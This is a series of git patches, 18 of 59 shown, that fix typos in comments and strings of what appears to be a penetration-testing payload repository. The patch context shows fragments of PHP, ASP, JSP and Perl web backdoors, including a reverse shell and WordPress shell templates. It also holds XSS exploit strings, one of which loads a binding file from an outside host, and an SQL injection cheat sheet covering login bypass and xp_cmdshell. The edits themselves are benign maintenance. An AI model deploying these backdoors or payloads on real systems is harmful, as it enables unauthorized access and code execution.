From 6479e7a8050ea00a6abf710fa633c381a8b3e411 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 21:02:58 -0400
Subject: [PATCH 01/59] spelling: access

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 web-backdoors/cfm/shell.cfm | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/web-backdoors/cfm/shell.cfm b/web-backdoors/cfm/shell.cfm
index c5a02daf..74d08735 100644
--- a/web-backdoors/cfm/shell.cfm
+++ b/web-backdoors/cfm/shell.cfm
@@ -18,7 +18,7 @@
 ***
 ********************************************************************************
 ***
-*** This file provides access to shell acces on the system.
+*** This file provides access to shell access on the system.
 *** Modified by Tim Medin
 *** Modified by Matt Presson <@matt_presson>
 ***     - Added some basic authentication via HTTP header

From c9ec26c000f82ab12d734ca28d20a81cbf77d4fb Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 21:03:11 -0400
Subject: [PATCH 02/59] spelling: adds

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 web-backdoors/php/proxy.php                 | 2 +-
 web-backdoors/wordpress/templates/proxy.php | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/web-backdoors/php/proxy.php b/web-backdoors/php/proxy.php
index e39439d2..aaea58f5 100644
--- a/web-backdoors/php/proxy.php
+++ b/web-backdoors/php/proxy.php
@@ -94,7 +94,7 @@ function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
 set_error_handler('error_handler');
 
 function geturlarray($u) {
-  // creates the url array, addes a scheme if it is missing and retries parsing
+  // creates the url array, adds a scheme if it is missing and retries parsing
   $o = parse_url($u);
   if (!isset($o["scheme"])) { $o = parse_url("http://" . $u); }
   if (!isset($o["path"])) { $o["path"] = "/"; }
diff --git a/web-backdoors/wordpress/templates/proxy.php b/web-backdoors/wordpress/templates/proxy.php
index 62d18f6d..cb857523 100644
--- a/web-backdoors/wordpress/templates/proxy.php
+++ b/web-backdoors/wordpress/templates/proxy.php
@@ -79,7 +79,7 @@ function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
 set_error_handler('error_handler');
 
 function geturlarray($u) {
-  // creates the url array, addes a scheme if it is missing and retries parsing
+  // creates the url array, adds a scheme if it is missing and retries parsing
   $o = parse_url($u);
   if (!isset($o["scheme"])) { $o = parse_url("http://" . $u); }
   if (!isset($o["path"])) { $o["path"] = "/"; }

From 494e9744e4e9b3a5adf13bc4ce53e253d7dde89f Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Fri, 3 Sep 2021 14:56:40 -0400
Subject: [PATCH 03/59] spelling: advise

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 web-backdoors/php/shell.php                 | 2 +-
 web-backdoors/wordpress/templates/shell.php | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/web-backdoors/php/shell.php b/web-backdoors/php/shell.php
index 8cf7500e..f7856435 100644
--- a/web-backdoors/php/shell.php
+++ b/web-backdoors/php/shell.php
@@ -231,7 +231,7 @@ function stripslashes_deep($value) {
 
             // We canot use putenv() in safe mode.
             if (!ini_get('safe_mode')) {
-                // Advice programs (ls for example) of the terminal size.
+                // Advise programs (ls for example) of the terminal size.
                 putenv('ROWS=' . $rows);
                 putenv('COLUMNS=' . $columns);
             }
diff --git a/web-backdoors/wordpress/templates/shell.php b/web-backdoors/wordpress/templates/shell.php
index 1ba24458..39ab534a 100644
--- a/web-backdoors/wordpress/templates/shell.php
+++ b/web-backdoors/wordpress/templates/shell.php
@@ -211,7 +211,7 @@ function wpl_stripslashes_deep($value) {
 
             // We canot use putenv() in safe mode.
             if (!ini_get('safe_mode')) {
-                // Advice programs (ls for example) of the terminal size.
+                // Advise programs (ls for example) of the terminal size.
                 putenv('ROWS=' . $rows);
                 putenv('COLUMNS=' . $columns);
             }

From 310c8843e83cdd09b5255a84444ed6d988c7efef Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:53:40 -0400
Subject: [PATCH 04/59] spelling: algorithm

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt b/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt
index cbe54fd0..b5f89db9 100644
--- a/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt
+++ b/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt
@@ -427,7 +427,7 @@ Author Name: ha.ckers.org
 Extraneous Open Brackets
 Exploit Name: Extraneous Open Brackets
 Exploit String: <<SCRIPT>alert("XSS");//<</SCRIPT>
-Exploit Description: (Submitted by Franz Sedlmaier http://www.pilorz.net/).  This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorythm like Boyer-Moore (http://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course).  The double slash comments out the ending extraneous bracket to supress a JavaScript error.
+Exploit Description: (Submitted by Franz Sedlmaier http://www.pilorz.net/).  This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorithm like Boyer-Moore (http://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course).  The double slash comments out the ending extraneous bracket to supress a JavaScript error.
 Exploit Tags: general, obfuscated
 Author Name: ha.ckers.org
 

From 570487ae71712231c812ea182150cb34691421b5 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:53:42 -0400
Subject: [PATCH 05/59] spelling: assassinate

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 regex/nsa-wordlist.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/regex/nsa-wordlist.txt b/regex/nsa-wordlist.txt
index 078e5e69..ac1ba080 100644
--- a/regex/nsa-wordlist.txt
+++ b/regex/nsa-wordlist.txt
@@ -663,7 +663,7 @@ COS
 E.T.
 credit card fraud
 b9
-assasinate
+assassinate
 virus
 anarchy
 rogue

From f065b00367aa1aa30e8cc699c06babed9162b0c1 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:53:43 -0400
Subject: [PATCH 06/59] spelling: attribute

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt b/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt
index b5f89db9..0fd330c1 100644
--- a/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt
+++ b/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt
@@ -865,7 +865,7 @@ Author Name: ha.ckers.org
 Mozilla -moz-binding-url injection
 Exploit Name: Mozilla -moz-binding-url injection
 Exploit String:  style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a="
-Exploit Description: The vector incudes a binding file via injected style attrbute. Gecko only.
+Exploit Description: The vector incudes a binding file via injected style attribute. Gecko only.
 Exploit Tags: general, injection, gecko, style injection, XBL
 Author Name: .mario
 

From 5bbe06b398ec9e4f33e8fd1e3db93587c697072e Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:53:44 -0400
Subject: [PATCH 07/59] spelling: available

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html | 2 +-
 web-backdoors/php/proxy.php                              | 2 +-
 web-backdoors/wordpress/templates/proxy.php              | 2 +-
 3 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html b/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html
index bedb8f58..3f438d01 100644
--- a/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html
+++ b/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html
@@ -320,7 +320,7 @@ <h2>Some Extra MySQL Notes </h2>
     <br />
 
     <ul>
-      <li><strong>By default it’s not avaliable !</strong> 
+      <li><strong>By default it’s not available !</strong> 
 
         <ul>
           <li><code>create table foo( line blob ); 
diff --git a/web-backdoors/php/proxy.php b/web-backdoors/php/proxy.php
index aaea58f5..b9bed910 100644
--- a/web-backdoors/php/proxy.php
+++ b/web-backdoors/php/proxy.php
@@ -104,7 +104,7 @@ function geturlarray($u) {
 function buildurl ($u) {
   // build the url from the url array
   // this is used because the built in function isn't 
-  // avilable in all installs of php
+  // available in all installs of php
   if (!isset($u["host"])) { return null; }
 
   $s  = isset($u["scheme"])   ? $u["scheme"]         : "http";
diff --git a/web-backdoors/wordpress/templates/proxy.php b/web-backdoors/wordpress/templates/proxy.php
index cb857523..c81c5f13 100644
--- a/web-backdoors/wordpress/templates/proxy.php
+++ b/web-backdoors/wordpress/templates/proxy.php
@@ -89,7 +89,7 @@ function geturlarray($u) {
 function buildurl ($u) {
   // build the url from the url array
   // this is used because the built in function isn't 
-  // avilable in all installs of php
+  // available in all installs of php
   if (!isset($u["host"])) { return null; }
 
   $s  = isset($u["scheme"])   ? $u["scheme"]         : "http";

From 9fb8d8a546190b75bec5e689dccf52c8bab00796 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 21:08:17 -0400
Subject: [PATCH 08/59] spelling: change

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 web-backdoors/pl-cgi/up.pl | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/web-backdoors/pl-cgi/up.pl b/web-backdoors/pl-cgi/up.pl
index 9522cfc5..a335611b 100755
--- a/web-backdoors/pl-cgi/up.pl
+++ b/web-backdoors/pl-cgi/up.pl
@@ -36,7 +36,7 @@
 #my $g_upload_db="upload.db";
 
 # overwrite the existing file or not. Default is to overwrite
-# chanage the value to 0 if you do not want to overwrite an existing file.
+# change the value to 0 if you do not want to overwrite an existing file.
 my $g_overwrite=1;
 
 # if you want to restrict upload to files with certain extentions, change

From 27d8c0263db326f2c0c52789a5d34e0bf92bfbb9 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:53:51 -0400
Subject: [PATCH 09/59] spelling: circuit

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 web-backdoors/asp/file.asp | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/web-backdoors/asp/file.asp b/web-backdoors/asp/file.asp
index 83baf73e..f6d4d220 100644
--- a/web-backdoors/asp/file.asp
+++ b/web-backdoors/asp/file.asp
@@ -116,7 +116,7 @@ end if
 
 <%
 ' get the path to work with, if it isn't set or valid then start with the web root
-' goofy if statement is used since vbscript doesn't use short-curcuit logic
+' goofy if statement is used since vbscript doesn't use short-circuit logic
 path = trim(Request.QueryString("path"))
 if len(path) = 0 then
 	path = fso.GetFolder(Server.MapPath("\"))

From e99b41d38c9adbedd24dda344be9f1bbd08334fb Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:53:46 -0400
Subject: [PATCH 10/59] spelling: columns

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 web-backdoors/jsp/browser.jsp | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/web-backdoors/jsp/browser.jsp b/web-backdoors/jsp/browser.jsp
index 2a1003a5..3f1be0d0 100755
--- a/web-backdoors/jsp/browser.jsp
+++ b/web-backdoors/jsp/browser.jsp
@@ -40,7 +40,7 @@
 
     //The refresh time in seconds of the upload monitor window
 	private static final int UPLOAD_MONITOR_REFRESH = 2;
-	//The number of colums for the edit field
+	//The number of columns for the edit field
 	private static final int EDITFIELD_COLS = 85;
 	//The number of rows for the edit field
 	private static final int EDITFIELD_ROWS = 30;

From 1a26a1047e36b75d3d7381ea6d29ef53cd1102ff Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:53:47 -0400
Subject: [PATCH 11/59] spelling: coming

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html b/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html
index 3f438d01..180cbde7 100644
--- a/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html
+++ b/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html
@@ -626,7 +626,7 @@ <h4>AK213 - <em>03.02.2010</em></h4>
         <img src="/avatar/225341048/" width="64" height="64" alt="" />
     </div>
     <h4>vinnu - <em>28.01.2010</em></h4>
-    <p>           @Brent Jenkins:<br />Well there is a case, when this check can be thwarted, check scenario:<br />There are atleast two input fields (mostly user/password) and the fields are bound to the maxlength, and the maxlength check is also implemented in server side script e.g. asp, php etc.<br />Noiw If u fill the first comming input with single quote ' (SQL meta) then, above script will try to pair up the single quotes.<br />Now if all the space is acquired by single quotes, then above listed script will try to pair up all the single quotes and this will obviously  increase the size of input variable. Then if, the variable input is tripped, then it may lead to an unpaired single quotation mark, this will pair up with the second condition's first single quote and will make second condition as a string and the second input becomes a part of SQL script and making SQL injection feasible.<br />LOX (Legion Of Xtremers)INDIA</p>
+    <p>           @Brent Jenkins:<br />Well there is a case, when this check can be thwarted, check scenario:<br />There are atleast two input fields (mostly user/password) and the fields are bound to the maxlength, and the maxlength check is also implemented in server side script e.g. asp, php etc.<br />Noiw If u fill the first coming input with single quote ' (SQL meta) then, above script will try to pair up the single quotes.<br />Now if all the space is acquired by single quotes, then above listed script will try to pair up all the single quotes and this will obviously  increase the size of input variable. Then if, the variable input is tripped, then it may lead to an unpaired single quotation mark, this will pair up with the second condition's first single quote and will make second condition as a string and the second input becomes a part of SQL script and making SQL injection feasible.<br />LOX (Legion Of Xtremers)INDIA</p>
 </div>
 <div class="comment" >
     <div class="commentd">

From ee56373cb52c6797e8a03ca68717063c55d8e35c Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:53:49 -0400
Subject: [PATCH 12/59] spelling: command

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 web-backdoors/php/shell.php                 | 2 +-
 web-backdoors/wordpress/templates/shell.php | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/web-backdoors/php/shell.php b/web-backdoors/php/shell.php
index f7856435..b5d61c06 100644
--- a/web-backdoors/php/shell.php
+++ b/web-backdoors/php/shell.php
@@ -181,7 +181,7 @@ function stripslashes_deep($value) {
         
         array_unshift($_SESSION['history'], $command);
   
-        /* Now append the commmand to the output. */
+        /* Now append the command to the output. */
         $_SESSION['output'] .= '$ ' . $command . "\n";
 
         /* Initialize the current working directory. */
diff --git a/web-backdoors/wordpress/templates/shell.php b/web-backdoors/wordpress/templates/shell.php
index 39ab534a..b5aeb21a 100644
--- a/web-backdoors/wordpress/templates/shell.php
+++ b/web-backdoors/wordpress/templates/shell.php
@@ -161,7 +161,7 @@ function wpl_stripslashes_deep($value) {
         
         array_unshift($_SESSION['history'], $command);
   
-        /* Now append the commmand to the output. */
+        /* Now append the command to the output. */
         $_SESSION['output'] .= '$ ' . $command . "\n";
 
         /* Initialize the current working directory. */

From 73b1ce02d69270c8e4f4f0dd30d10fbd3bfa8a1d Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:53:50 -0400
Subject: [PATCH 13/59] spelling: contains

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 discovery/WebSocket/WebSocket-subprotocols.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/discovery/WebSocket/WebSocket-subprotocols.txt b/discovery/WebSocket/WebSocket-subprotocols.txt
index b13f84cc..60b2f9b7 100644
--- a/discovery/WebSocket/WebSocket-subprotocols.txt
+++ b/discovery/WebSocket/WebSocket-subprotocols.txt
@@ -1,5 +1,5 @@
 # this list can be used to enumerate supported Web Socket sub protocols of a web socket server
-# It conyains the official IANA registerd Web Socket sub protocols
+# It contains the official IANA registerd Web Socket sub protocols
 # Source: https://www.iana.org/assignments/websocket/websocket.xml
 # Example subprotocol request header:
 # Sec-WebSocket-Protocol: mqtt, wamp

From 86550ec87a420efedba393c5e68644767334a718 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:53:52 -0400
Subject: [PATCH 14/59] spelling: daemonization

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 web-backdoors/php/php-reverse-shell.php                 | 2 +-
 web-backdoors/wordpress/templates/php-reverse-shell.php | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/web-backdoors/php/php-reverse-shell.php b/web-backdoors/php/php-reverse-shell.php
index 921c0598..76eb06c0 100644
--- a/web-backdoors/php/php-reverse-shell.php
+++ b/web-backdoors/php/php-reverse-shell.php
@@ -38,7 +38,7 @@
 // -----------
 // proc_open and stream_set_blocking require PHP version 4.3+, or 5+
 // Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
-// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
+// Some compile-time options are needed for daemonization (like pcntl, posix).  These are rarely available.
 //
 // Usage
 // -----
diff --git a/web-backdoors/wordpress/templates/php-reverse-shell.php b/web-backdoors/wordpress/templates/php-reverse-shell.php
index c2cf80d9..be4b6a4c 100644
--- a/web-backdoors/wordpress/templates/php-reverse-shell.php
+++ b/web-backdoors/wordpress/templates/php-reverse-shell.php
@@ -38,7 +38,7 @@
 // -----------
 // proc_open and stream_set_blocking require PHP version 4.3+, or 5+
 // Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
-// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
+// Some compile-time options are needed for daemonization (like pcntl, posix).  These are rarely available.
 //
 // Usage
 // -----

From a8b134236e9c65e3def19cee6c342777a00bf862 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:53:53 -0400
Subject: [PATCH 15/59] spelling: daemonize

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 web-backdoors/php/php-reverse-shell.php                 | 6 +++---
 web-backdoors/wordpress/templates/php-reverse-shell.php | 6 +++---
 2 files changed, 6 insertions(+), 6 deletions(-)

diff --git a/web-backdoors/php/php-reverse-shell.php b/web-backdoors/php/php-reverse-shell.php
index 76eb06c0..05d48e5a 100644
--- a/web-backdoors/php/php-reverse-shell.php
+++ b/web-backdoors/php/php-reverse-shell.php
@@ -59,7 +59,7 @@
 // Daemonise ourself if possible to avoid zombies later
 //
 
-// pcntl_fork is hardly ever available, but will allow us to daemonise
+// pcntl_fork is hardly ever available, but will allow us to daemonize
 // our php process and avoid zombies.  Worth a try...
 if (function_exists('pcntl_fork')) {
 	// Fork and have the parent process exit
@@ -83,7 +83,7 @@
 
 	$daemon = 1;
 } else {
-	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
+	printit("WARNING: Failed to daemonize.  This is quite common and not fatal.");
 }
 
 // Change to a safe directory
@@ -178,7 +178,7 @@
 fclose($pipes[2]);
 proc_close($process);
 
-// Like print, but does nothing if we've daemonised ourself
+// Like print, but does nothing if we've daemonized ourself
 // (I can't figure out how to redirect STDOUT like a proper daemon)
 function printit ($string) {
 	if (!$daemon) {
diff --git a/web-backdoors/wordpress/templates/php-reverse-shell.php b/web-backdoors/wordpress/templates/php-reverse-shell.php
index be4b6a4c..cebec781 100644
--- a/web-backdoors/wordpress/templates/php-reverse-shell.php
+++ b/web-backdoors/wordpress/templates/php-reverse-shell.php
@@ -61,7 +61,7 @@
 // Daemonise ourself if possible to avoid zombies later
 //
 
-// pcntl_fork is hardly ever available, but will allow us to daemonise
+// pcntl_fork is hardly ever available, but will allow us to daemonize
 // our php process and avoid zombies.  Worth a try...
 if (function_exists('pcntl_fork')) {
 	// Fork and have the parent process exit
@@ -85,7 +85,7 @@
 
 	$daemon = 1;
 } else {
-	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
+	printit("WARNING: Failed to daemonize.  This is quite common and not fatal.");
 }
 
 // Change to a safe directory
@@ -180,7 +180,7 @@
 fclose($pipes[2]);
 proc_close($process);
 
-// Like print, but does nothing if we've daemonised ourself
+// Like print, but does nothing if we've daemonized ourself
 // (I can't figure out how to redirect STDOUT like a proper daemon)
 function printit ($string) {
 	if (!$daemon) {

From 640d5fb0ce0b883768d38cbc70043efbae7cbcab Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:53:55 -0400
Subject: [PATCH 16/59] spelling: developed

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html b/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html
index 180cbde7..f3427d36 100644
--- a/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html
+++ b/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html
@@ -591,7 +591,7 @@ <h4>vinnu - <em>16.02.2010</em></h4>
         <img src="/avatar/1843677050/" width="64" height="64" alt="" />
     </div>
     <h4><a href="http&#58;&#47;&#47;wiki&#46;eslimasec&#46;com" rel="nofollow">eslimasec</a> - <em>13.02.2010</em></h4>
-    <p>           Dear Ferruh,<br /><br />we developped a small tool to aid Webapptesting that includes many of your tricks, It can be find here<a href="http://wiki.eslimasec.com/esliwiki/ProjectsPost">http://wiki.eslimasec.com/esliwiki/ProjectsPost</a>.<br /><br />hope it is useful 4 u and ya readers.<br /><br />best regards</p>
+    <p>           Dear Ferruh,<br /><br />we developed a small tool to aid Webapptesting that includes many of your tricks, It can be find here<a href="http://wiki.eslimasec.com/esliwiki/ProjectsPost">http://wiki.eslimasec.com/esliwiki/ProjectsPost</a>.<br /><br />hope it is useful 4 u and ya readers.<br /><br />best regards</p>
 </div>
 <div class="comment" >
     <div class="commentd">

From 336f77de95f360f89c37591d24d936b5d73a0178 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:53:57 -0400
Subject: [PATCH 17/59] spelling: directory

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 web-backdoors/asp/ntdaddy.asp | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/web-backdoors/asp/ntdaddy.asp b/web-backdoors/asp/ntdaddy.asp
index c9ce94eb..44951d49 100755
--- a/web-backdoors/asp/ntdaddy.asp
+++ b/web-backdoors/asp/ntdaddy.asp
@@ -101,7 +101,7 @@ FileAttributes  =  "Volume"
 case  16
 FileAttributes  =  "Directory"
 case  19
-FileAttributes  =  "Read  Only,  Hidden,  Directoy"
+FileAttributes  =  "Read  Only,  Hidden,  Directory"
 case  23
 FileAttributes  =  "Read  Only,  Hidden,  System,  Directory"
 case  32
@@ -188,7 +188,7 @@ FolderAttributes  =  "Read  Only,  Directory"
 case  18  'Extra
 FolderAttributes  =  "Hidden,  Directory"
 case  19
-FolderAttributes  =  "Read  Only,  Hidden,  Directoy"
+FolderAttributes  =  "Read  Only,  Hidden,  Directory"
 case  20  'Extra
 FolderAttributes  =  "System,  Directory"
 case  22  'Extra
@@ -489,7 +489,7 @@ FolderAttributes  =  "Read  Only,  Directory"
 case  18  'Extra
 FolderAttributes  =  "Hidden,  Directory"
 case  19
-FolderAttributes  =  "Read  Only,  Hidden,  Directoy"
+FolderAttributes  =  "Read  Only,  Hidden,  Directory"
 case  20  'Extra
 FolderAttributes  =  "System,  Directory"
 case  22  'Extra
@@ -600,7 +600,7 @@ FileAttributes  =  "Volume"
 case  16
 FileAttributes  =  "Directory"
 case  19
-FileAttributes  =  "Read  Only,  Hidden,  Directoy"
+FileAttributes  =  "Read  Only,  Hidden,  Directory"
 case  23
 FileAttributes  =  "Read  Only,  Hidden,  System,  Directory"
 case  32

From d26155f954d050676c8293079403961d36d564ba Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:53:58 -0400
Subject: [PATCH 18/59] spelling: division

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html b/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html
index f3427d36..fd4fb777 100644
--- a/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html
+++ b/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html
@@ -43,7 +43,7 @@ <h1><a href="/sql-injection-cheatsheet-oku/">SQL Injection Cheat Sheet</a></h1>
         <a href="/tag/sql+injection/" class="tag">sql injection</a>, <a href="/tag/security/" class="tag">security</a>, <a href="/tag/web+application+security/" class="tag">web application security</a>, <a href="/tag/web+uygulamasi+guvenligi/" class="tag">web uygulamasi guvenligi</a>, <a href="/tag/english/" class="tag">english</a>,  <span class="date">15.03.2007</span>
     </div>
 <!--<div style="float:right"><script type="text/javascript" src="http://yakutum.pasaj.com/widgetjs"></script></div>-->
-    <div class="post"><p> </p>  <h2><em>Find and exploit SQL Injections with <a href="http://www.mavitunasecurity.com/">Netsparker, Next Generation Web Application Security Scanner</a></em></h2>  <p> </p>  <p><em>SQL Injection Cheat Sheet, <strong>Document Version 1.4</strong></em></p>  <h2><a id="about" name="about"></a>About SQL Injection Cheat Sheet </h2>  <p>Currently only for <strong>MySQL</strong> and <strong>Microsoft SQL Server, </strong>some <strong>ORACLE</strong> and some <strong>PostgreSQL</strong>. Most of samples are not correct for every single situation. Most of the real world environments may change because of parenthesis, different code bases and unexpected, strange SQL sentences.     <br />    <br />Samples are provided to allow reader to get basic idea of a potential attack and almost every section includes a brief information about itself. </p>  <table  cellspacing="3" cellpadding="3"><tbody>     <tr>       <td align="right"><strong>M : </strong></td>        <td>MySQL </td>     </tr>      <tr>       <td align="right"><strong>S : </strong></td>        <td>SQL Server</td>     </tr>      <tr>       <td align="right"><strong>P : </strong></td>        <td>PostgreSQL</td>     </tr>      <tr>       <td align="right"><strong>O : </strong></td>        <td>Oracle</td>     </tr>      <tr>       <td align="right"><strong>+ : </strong></td>        <td>Possibly all other databases </td>     </tr>   </tbody></table>  <h5><em><strong>Examples;</strong></em></h5>  <ul>   <li><em>(MS) means : MySQL and SQL Server etc. </em></li>    <li>(M*S) means : Only in some versions of MySQL or special conditions see related note and SQL Server </li> </ul>  <h2><a id="TOC" name="TOC"></a>Table Of Contents </h2>  <ol>   <li><a href="#about">About SQL Injection Cheat Sheet </a></li>    <li><a href="#SyntaxBasicAttacks">Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks </a>      <ol>       <li><a href="#LineComments">Line Comments </a>          <ul>           <li><a href="#LineCommentAttacks">SQL Injection Attack Samples</a> </li>         </ul>       </li>        <li><a href="#InlineComments">Inline Comments </a>          <ul>           <li><a href="#InlineSamples">Classical Inline Comment SQL Injection Attack Samples</a> </li>            <li><a href="#MySQLInlineSamples">MySQL Version Detection Sample Attacks</a> </li>         </ul>       </li>        <li><a href="#StackingQueries">Stacking Queries</a>           <ul>           <li><a href="#LangDbFigure">Language / Database Stacked Query Support Table </a></li>            <li><a href="#AboutMySQLandPHP">About MySQL and PHP</a> </li>            <li><a href="#StackedSamples">Stacked SQL Injection Attack Samples</a> </li>         </ul>       </li>        <li><a href="#IfStatements">If Statements</a>           <ul>           <li><a href="#MySQLIf">MySQL If Statement</a> </li>            <li><a href="#SQLServerIf">SQL Server If Statement </a></li>            <li><a href="#SampleIfStatements">If Statement SQL Injection Attack Samples </a></li>         </ul>       </li>        <li><a href="#UsingIntegers">Using Integers </a></li>        <li><a href="#StringOperations">String  Operations</a>           <ul>           <li><a href="#StringConcat">String Concatenation </a></li>         </ul>       </li>        <li><a href="#StringwithoutQuotes">Strings without Quotes</a>           <ul>           <li><a href="#HexbasedSamples">Hex based SQL Injection Samples</a> </li>         </ul>       </li>        <li><a href="#StringModification">String Modification & Related </a></li>        <li><a href="#UnionInjections">Union Injections</a>           <ul>           <li><a href="#UnionLanguageIssues">UNION – Fixing Language Issues</a> </li>         </ul>       </li>        <li><a href="#ByPassingLoginScreens">Bypassing Login Screens</a> </li>        <li><a href="#Enablecmdshell">Enabling xp_cmdshell in SQL Server 2005 </a></li>        <li><em>Other parts are not so well formatted but check out by yourself, drafts, notes and stuff, scroll down and see. </em></li>     </ol>   </li> </ol>  <h2><a 